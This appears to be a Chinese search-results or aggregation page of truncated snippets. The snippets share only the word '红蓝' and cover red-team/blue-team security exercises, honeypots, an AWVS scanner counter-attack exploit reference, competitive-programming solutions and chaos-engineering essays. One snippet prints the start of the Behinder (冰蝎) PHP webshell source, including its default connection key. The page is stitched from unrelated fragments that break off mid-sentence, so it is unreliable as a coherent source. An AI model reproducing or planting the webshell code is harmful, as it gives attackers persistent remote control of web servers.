免责声明本教程仅为合法的教学目的而准备，严禁用于任何形式的违法犯罪活动及其他商业行为，在使用本教程前，您应确保该行为符合当地的法律法规，继续阅读即表示您需自行承担所有操作的后果，如有异议，请立即停止本文章阅读。                            

在红蓝对抗（RedTeamvs.BlueTeamexercises）中，双方会使用一系列的工具来模拟攻击和防御。以下是一些常用的工具，分为红队（攻击者）和蓝队（防御者）：红队（攻击者）工具：KaliLinux -一个安全测试操作系统，预装了许多渗透测试工具。Metasploit -一个用于渗透测试的框架，提供漏洞利用、后

声明：本博文，只是基于学习进行记录。冰蝎源码<?php@error_reporting(0);session_start();$key="密钥";//该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond$_SESSION['k']=$key;$post=file_get_contents("php://input");if(!extension_loaded('

前言不想说啥了最简单的一题是紫，去死吧只改了T1、T2，T2原题翻译和赛时题面描述都很唐，赛后断断续续加了好多hack。T1岛屿设\(f_{a,b}\)表示\(a\)条两端同色链，\(b\)条两端异色链时连通块数量的期望。红红蓝蓝相连得到红蓝\(\tof_{a-1,b+1}\)。红红红蓝相连得到红红

T1岛屿https://www.gxyzoj.com/d/hzoj/p/4177显然每个点只增加了一条边，最终每个点的度数都为2，所以最终必然是很多个环，连边的过程中，也必然是一些链和一些环由题，蓝同色链的个数和红同色链的个数相等，所以设\(f(a,b)\)为a条红同色链，b条异色链的期望考虑先处理异色链：红红连红蓝为

本章为该系列的第20篇，也是整个【红蓝/演练】系列的最后一篇，前前后后历时9个月，20篇文章，3万5千字，算是对自己参与过的演练工作做个总结，也希望能对大家有帮助。很多人问我写文章的时间哪里来的，其实这个系列大部分文章是我在地铁上完成的，有座就拿出电脑来写，没座就掏出手机来写，到今天终

红蓝对抗服务方案在蓝队服务中，作为攻击方将开展对目标资产的模拟入侵，寻找攻击路径，发现安全漏洞和隐患。除获取目标系统的关键信息（包括但不限于资产信息、重要业务数据、代码或管理员账号等）外，还通过漏洞探测利用和社会工程学，获取root权限并向进行内网横向移动和扩展，来发现渗透测试

1简介蜜罐是对攻击者的欺骗技术，用以监视、检测、分析和溯源攻击行为，其没有业务上的用途，所有流入/流出蜜罐的流量都预示着扫描或者攻击行为，因此可以比较好的聚焦于攻击流量。蜜罐可以实现对攻击者的主动诱捕，能够详细地记录攻击者攻击过程中的许多痕迹，可以收集到大量有价值的数

一、背景目前大促备战常见备战工作：专项压测（全链路压测、内部压测）、灾备演练、降级演练、限流、巡检（监控、应用健康度）、混沌演练（红蓝对抗），如下图所示。随着平台业务越来越复杂，红蓝对抗的作用愈来愈明显，下面将详细介绍大数据平台在本次双十一大促备战工作中是如何开展红蓝对抗的。

AWVS的反制awvs10版本漏洞https://www.exploit-db.com/exploits/39755awvs14以下的版本漏洞触发2021年4月13日，安全研究人员RajvardhanAgarwal在推特公布了本周第⼀个远程代码执行（RCE）的0Day漏洞ChromiumV8JavaScript引擎远程代码执行Chromium版本的漏洞，可以构造然后执行sh

记录一下JOISC2023的做题记录Day1T1TwoCurrencies给定一棵树，在边上有总计\(m\)个检查站，经过一个检查站需要叫\(1\)枚金币或者若干枚银币。\(Q\)次询问，问一个人有\(X\)枚金币和\(Y\)枚银币，能否从\(u\)走到\(v\)，同时回答最多可以留下多少枚金币。发现一定是

本次的课程主题为：红队攻击之多级隧道红蓝对抗之快速打点windows操作系统中的二进制漏洞分析供应链攻击密码学常见算法以及在红队攻击当中的应用反溯源/为何莫名其妙就上线课程地址：https://www.bilibili.com/video/BV1vh4y1V7Zw添加客服二维码 回复关键词“红蓝对抗实战

系统红蓝军，不仅可以引导开发人员做好功能自测，更可以在不增加成本的情况下，引导企业有效应对生产系统稳定性***意外***故障。1基于观察企业经常出现意料之外的软件系统生产环境稳定性故障。2问出问题是什么原因导致企业经常出现意料之外的软件系统生产环境稳定性故障？3形成可

作为企业IT部门某个开发团队负责人的你，从书上和大佬那里得知，软件开发团队中的开发人员，如果在将所完成的功能提交给测试人员之前，加强自测，那么就能降低软件开发过程中的返工。于是你为每位开发人员，都准备了自测环境。然后告诉开发人员，在完成功能的开发，向测试人员提测前，需要在自测环